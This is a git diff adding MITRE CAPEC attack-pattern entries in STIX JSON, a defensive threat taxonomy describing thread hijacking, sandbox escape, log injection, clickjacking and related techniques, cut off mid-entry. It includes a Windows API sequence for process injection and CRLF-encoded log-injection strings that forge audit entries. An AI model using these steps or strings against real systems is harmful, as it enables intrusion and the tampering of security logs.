b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9.json @@ -0,0 +1,80 @@ +{ + "id": "bundle--3099ae46-1773-4ae9-919b-d43860f0b4c6", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary hijacks a privileged thread of execution by injecting malicious code into a running process. By using a privleged thread to do their bidding, adversaries can evade process-based detection that would stop an attack that creates a new process. This can lead to an adversary gaining access to the process's memory and can also enable elevated privileges. The most common way to perform this attack is by suspending an existing thread and manipulating its memory.", + "external_references": [ + { + "external_id": "CAPEC-30", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/30.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Process Injection: Thread Execution Hijacking", + "external_id": "T1055.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1055/003" + } + ], + "id": "attack-pattern--1cc991f7-9f62-4e6b-9e37-70fa23ab23e9", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Hijacking a Privileged Thread of Execution", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c05fff04-b965-4a11-9c18-379dac31969f" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversary targets an application written using Java's AWT, with the 1.2.2 era event model. In this circumstance, any AWTEvent originating in the underlying OS (such as a mouse click) would return a privileged thread (e.g., a system call). The adversary could choose to not return the AWT-generated thread upon consuming the event, but instead leveraging its privilege to conduct privileged operations." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine target thread: The adversary determines the underlying system thread that is subject to user-control

Experiment

  1. Gain handle to thread: The adversary then gains a handle to a process thread.

    2. Techniques
    Use the \"OpenThread\" API call in Windows on a known thread.
    Cause an exception in a java privileged block public function and catch it, or catch a normal signal. The thread is then hanging and the adversary can attempt to gain a handle to it.

  2. Alter process memory: Once the adversary has a handle to the target thread, they will suspend the thread and alter the memory using native OS calls.

    3. Techniques
    On Windows, use \"SuspendThread\" followed by \"VirtualAllocEx\", \"WriteProcessMemory\", and \"SetThreadContext\".

Exploit

  1. Resume thread execution: Once the process memory has been altered to execute malicious code, the thread is then resumed.

    2. Techniques
    On Windows, use \"ResumeThread\".
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The application in question employs a threaded model of execution with the threads operating at, or having the ability to switch to, a higher privilege level than normal users", + "In order to feasibly execute this class of attacks, the adversary must have the ability to hijack a privileged thread. This ability includes, but is not limited to, modifying environment variables that affect the process the thread belongs to, or calling native OS calls that can suspend and alter process memory. This does not preclude network-based attacks, but makes them conceptually more difficult to identify and execute." + ], + "x_capec_resources_required": [ + "\n None: No specialized resources are required to execute this type of attack. The adversary needs to be able to latch onto a privileged thread.\n The adversary does, however, need to be able to program, compile, and link to the victim binaries being executed so that it will turn control of a privileged thread over to the adversary's malicious code. This is the case even if the adversary conducts the attack remotely.\n " + ], + "x_capec_skills_required": { + "High": "Hijacking a thread involves knowledge of how processes and threads function on the target platform, the design of the target application as well as the ability to identify the primitives to be used or manipulated to hijack the thread." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json new file mode 100644 index 0000000000000000000000000000000000000000..312a26caac6a38f0a529024ce82c806a5993b709 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce.json @@ -0,0 +1,82 @@ +{ + "id": "bundle--161a4750-7b0f-439b-bc16-52a91b6ca1ab", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker may submit malicious code of another language to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox. For instance, Java code cannot perform unsafe operations, such as modifying arbitrary memory locations, due to restrictions placed on it by the Byte code Verifier and the JVM. If allowed, Java code can call directly into native C code, which may perform unsafe operations, such as call system calls and modify arbitrary memory locations on their behalf. To provide isolation, Java does not grant untrusted code with unmediated access to native C code. Instead, the sandboxed code is typically allowed to call some subset of the pre-existing native code that is part of standard libraries.", + "external_references": [ + { + "external_id": "CAPEC-237", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/237.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "J. Cappos, J. Rasley, J. Samuel, I. Beschastnikh, C. Barsan, A. Krishnamurthy, T. Anderson, Retaining Sandbox Containment Despite Bugs in Privileged Memory-Safe Code, The 17th ACM Conference on Computer and Communications Security (CCS '10), 2010", + "external_id": "REF-91", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Malware Protection Center: Threat Research and Response, 2007, Microsoft Corporation", + "external_id": "REF-92", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Exploit%3AJava%2FByteVerify.C" + } + ], + "id": "attack-pattern--1d1fb93d-ce79-4c64-9987-94577fb894ce", + "modified": "2020-12-17T00:00:00.000Z", + "name": "Escaping a Sandbox by Calling Code in Another Language", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4abd48c8-f737-45db-bd7b-97d989ebd471" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Accountability": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Non-Repudiation": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Exploit: Java/ByteVerify.C is a detection of malicious code that attempts to exploit a vulnerability in the Microsoft Virtual Machine (VM). The VM enables Java programs to run on Windows platforms. The Microsoft Java VM is included in most versions of Windows and Internet Explorer. In some versions of the Microsoft VM, a vulnerability exists because of a flaw in the way the ByteCode Verifier checks code when it is initially being loaded by the Microsoft VM. The ByteCode Verifier is a low level process in the Microsoft VM that is responsible for checking the validity of code - or byte code - as it is initially being loaded into the Microsoft VM. Java/ByteVerify.C attempts to download a file named \"msits.exe\", located in the same virtual directory as the Java applet, into the Windows system folder, and with a random file name. It then tries to execute this specific file. This flaw enables attackers to execute arbitrary code on a user's machine such as writing, downloading and executing additional malware. This vulnerability is addressed by update MS03-011, released in 2003." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Probing: The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

    2. Techniques
    The attacker probes the target application to see whether calling code of another language is allowed within a sandbox.

  2. Analysis: The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

    3. Techniques
    The attacker analyzes the target application to get a list of cross code weaknesses in the standard libraries of the sandbox.

Experiment

  1. Verify the exploitable security weaknesses: The attacker tries to craft malicious code of another language allowed by the sandbox to verify the security weaknesses of the standard libraries found in the Explore phase.

    2. Techniques
    The attacker tries to explore the security weaknesses by calling malicious code of another language allowed by the sandbox.

Exploit

  1. Exploit the security weaknesses in the standard libraries: The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries verified in the Experiment phase. The attacker will be able to obtain access to privileges that were not intentionally exposed by the sandbox, thus escaping the sandbox.

    2. Techniques
    The attacker calls malicious code of another language to exploit the security weaknesses in the standard libraries.
", + "x_capec_likelihood_of_attack": "Low", + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "High": "The attacker must have a good knowledge of the platform specific mechanisms of signing and verifying code. Most code signing and verification schemes are based on use of cryptography, the attacker needs to have an understand of these cryptographic operations in good detail." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json new file mode 100644 index 0000000000000000000000000000000000000000..8bea3767c9f35f685aeaaa96414beeaf2e92bd3a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c.json @@ -0,0 +1,79 @@ +{ + "id": "bundle--d016bee5-1b82-4f60-9ee8-cb0eb6abec24", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This OS fingerprinting probe checks to see if the remote host supports explicit congestion notification (ECN) messaging. ECN messaging was designed to allow routers to notify a remote host when signal congestion problems are occurring. Explicit Congestion Notification messaging is defined by RFC 3168. Different operating systems and versions may or may not implement ECN notifications, or may respond uniquely to particular ECN flag types.", + "external_references": [ + { + "external_id": "CAPEC-325", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/325.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + }, + { + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "external_id": "REF-128", + "source_name": "reference_from_CAPEC", + "url": "http://www.faqs.org/rfcs/rfc793.html" + }, + { + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC", + "external_id": "REF-212", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1d4575c5-62ed-4269-b372-b2aba82a7b4c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Congestion Control Flag (ECN) Probe", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--6227a1fc-7504-4a5f-b5b2-4c4f1fe38617" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications.Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending and receiving packets from a remote system." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json new file mode 100644 index 0000000000000000000000000000000000000000..093e3b86e4ee50107724f27358142daaaba35fc0 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486.json @@ -0,0 +1,96 @@ +{ + "id": "bundle--7caa88f1-6bd6-4209-93bf-d91f40a28b42", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing them to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.", + "external_references": [ + { + "external_id": "CAPEC-93", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/93.html" + }, + { + "external_id": "CWE-117", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/117.html" + }, + { + "external_id": "CWE-75", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/75.html" + }, + { + "external_id": "CWE-150", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/150.html" + }, + { + "description": "J. Viega, G. McGraw, Building Secure Software, 2002, Addison-Wesley", + "external_id": "REF-131", + "source_name": "reference_from_CAPEC" + }, + { + "description": "A. Muffet, The night the log was forged", + "external_id": "REF-550", + "source_name": "reference_from_CAPEC", + "url": "http://doc.novsu.ac.ru/oreilly/tcpip/puis/ch10_05.htm" + }, + { + "description": "The OWASP Application Security Desk Reference, 2009, The Open Web Application Security Project (OWASP)", + "external_id": "REF-551", + "source_name": "reference_from_CAPEC", + "url": "https://www.owasp.org/index.php/Log_Injection" + }, + { + "description": "Fortify Software, SAMATE - Software Assurance Metrics And Tool Evaluation, 2006--06---22, National Institute of Standards and Technology (NIST)", + "external_id": "REF-552", + "source_name": "reference_from_CAPEC", + "url": "https://samate.nist.gov/SRD/view_testcase.php?tID=1579" + } + ], + "id": "attack-pattern--1dd1397d-816a-4093-86a6-cf28bb32e486", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Log Injection-Tampering-Forging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--800f8095-99b6-4bb9-8bc6-8b9727201a2f" + ], + "x_capec_child_of_refs": [ + "attack-pattern--b3eaa7aa-9601-406c-ae82-0a0e2ea16116" + ], + "x_capec_consequences": { + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Dave Nielsen and Patrick Breitenbach PayPal Web Services (aka PHP Toolkit) 0.50, and possibly earlier versions, allows remote attackers to enter false payment entries into the log file via HTTP POST requests to ipn_success.php. See also: CVE-2006-0201", + "\n If a user submits the string \"twenty-one\" for val, the following entry is logged:\n INFO: Failed to parse val=twenty-one\n However, if an attacker submits the string\n twenty-one%0a%0aINFO:+User+logged+out%3dbadguy\n the following entry is logged:\n INFO: Failed to parse val=twenty-oneINFO: User logged out=badguy\n Clearly, attackers can use this same mechanism to insert arbitrary log entries.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Application's Log File Format: The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system.

    2. Techniques
    Determine logging utility being used by application (e.g. log4j)
    Gain access to application's source code to determine log file formats.
    Install or obtain access to instance of application and observe its log file format.

Exploit

  1. Manipulate Log Files: The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack.

    2. Techniques
    \n Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:\n \"%0D%0A[Thu%20Nov%2012%2011:22]:Info:%20User%20admin%20logged%20in\"\n may add the following forged entry into a log file:\n \"[Thu Nov 12 12:11:22]:Info: User admin logged in\"\n Different applications may require different encodings of the carriage return and line feed characters.\n
    \n Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain\n \n The script itself will be invisible to anybody viewing the logs in a web browser (unless they view the source for the page).\n
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The target host is logging the action and data of the user.", + "The target host insufficiently protects access to the logs or logging mechanisms." + ], + "x_capec_skills_required": { + "Low": "This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.", + "Medium": "A more sophisticated attack can try to defeat the input validation mechanism." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json new file mode 100644 index 0000000000000000000000000000000000000000..0adfc4ca674227307037d43757d796f2b2569a43 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a.json @@ -0,0 +1,54 @@ +{ + "id": "bundle--7b19d034-8d59-40d7-9c83-0f32234159e3", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json new file mode 100644 index 0000000000000000000000000000000000000000..0d7af18dc5d8bf88acbc83efee92a0ae86841c27 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1f3b920a-a706-494c-9486-69531a514912.json @@ -0,0 +1,51 @@ +{ + "id": "bundle--42c98d54-1d1e-48f8-9d38-50fd2e900b9a", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker takes advantage of the structure of integer variables to cause these variables to assume values that are not expected by an application. For example, adding one to the largest positive integer in a signed integer variable results in a negative number. Negative numbers may be illegal in an application and the application may prevent an attacker from providing them directly, but the application may not consider that adding two positive numbers can create a negative number do to the structure of integer storage formats.", + "external_references": [ + { + "external_id": "CAPEC-128", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/128.html" + }, + { + "external_id": "CWE-682", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/682.html" + } + ], + "id": "attack-pattern--1f3b920a-a706-494c-9486-69531a514912", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Integer Attacks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--71d31712-9174-4433-8e4f-8520a3ec1249" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--369d69a3-fb4a-49ac-8999-9b4ecfbf74c6" + ], + "x_capec_prerequisites": [ + "The target application must have an integer variable for which only some of the possible integer values are expected by the application and where there are no checks on the value of the variable before use.", + "The attacker must be able to manipulate the targeted integer variable such that normal operations result in non-standard values due to the storage structure of integers." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json new file mode 100644 index 0000000000000000000000000000000000000000..7713ae347944f2fa6193c9695caf7b9b4b5e9e8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5.json @@ -0,0 +1,105 @@ +{ + "id": "bundle--dd2653e7-cf1d-47c1-b86f-ece068181966", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by communicating directly with the server where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.", + "external_references": [ + { + "external_id": "CAPEC-22", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/22.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Exploiting Trust in Client", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "Web applications may use JavaScript to perform client side validation, request encoding/formatting, and other security functions, which provides some usability benefits and eliminates some client-server round-tripping. However, the web server cannot assume that the requests it receives have been subject to those validations, because an attacker can use an alternate method for crafting the HTTP Request and submit data that contains poisoned values designed to spoof a user and/or get the web server to disclose information.", + "Web 2.0 style applications may be particularly vulnerable because they in large part rely on existing infrastructure which provides scalability without the ability to govern the clients. Attackers identify vulnerabilities that either assume the client side is responsible for some security services (without the requisite ability to ensure enforcement of these checks) and/or the lack of a hardened, default deny server configuration that allows for an attacker probing for weaknesses in unexpected ways. Client side validation, request formatting and other services may be performed, but these are strictly usability enhancements not security enhancements.", + "Many web applications use client side scripting like JavaScript to enforce authentication, authorization, session state and other variables, but at the end of day they all make requests to the server. These client side checks may provide usability and performance gains, but they lack integrity in terms of the http request. It is possible for an attacker to post variables directly to the server without using any of the client script security checks and customize the patterns to impersonate other users or probe for more information.", + "Many message oriented middleware systems like MQ Series are rely on information that is passed along with the message request for making authorization decisions, for example what group or role the request should be passed. However, if the message server does not or cannot authenticate the authorization information in the request then the server's policy decisions about authorization are trivial to subvert because the client process can simply elevate privilege by passing in elevated group or role information which the message server accepts and acts on." + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--158c1c58-9c44-4822-a8a4-6cb791c5b3cb", + "attack-pattern--3c404955-b160-423f-b148-d4fa4727e3a9", + "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "attack-pattern--5e4a268e-f89f-445a-aa42-395922f56bf0" + ], + "x_capec_prerequisites": [ + "Server software must rely on client side formatted and validated values, and not reinforce these checks on the server side." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server" + ], + "x_capec_skills_required": { + "Medium": "The attacker must have fairly detailed knowledge of the syntax and semantics of client/server communications protocols and grammars" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json new file mode 100644 index 0000000000000000000000000000000000000000..6c84a9ebce4ce42e2e3d5fa22033040c16c1c714 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a.json @@ -0,0 +1,48 @@ +{ + "id": "bundle--5eac6a18-5647-46c6-bd06-94dd637ccbdf", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker creates a transparent overlay using flash in order to intercept user actions for the purpose of performing a clickjacking attack. In this technique, the Flash file provides a transparent overlay over HTML content. Because the Flash application is on top of the content, user actions, such as clicks, are caught by the Flash application rather than the underlying HTML. The action is then interpreted by the overlay to perform the actions the attacker wishes.", + "external_references": [ + { + "external_id": "CAPEC-181", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/181.html" + }, + { + "external_id": "CWE-1021", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1021.html" + } + ], + "id": "attack-pattern--1ff813eb-5def-43a0-a4b2-ea00aede114a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Flash File Overlay", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "The victim must be tricked into navigating to the attackers' decoy site and performing the actions on the decoy page.", + "The victim's browser must support invisible Flash overlays." + ], + "x_capec_resources_required": [ + "The attacker must be able to force the Flash overlay over the decoy content." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json new file mode 100644 index 0000000000000000000000000000000000000000..c958ca9068668f932092e7b0ce89a132fe35b808 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb.json @@ -0,0 +1,64 @@ +{ + "id": "bundle--1e7f5c64-b068-43e4-a325-a8f62497117c", + "objects": [ + { + "created": "2021-06-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n During the programming step of chip manufacture, 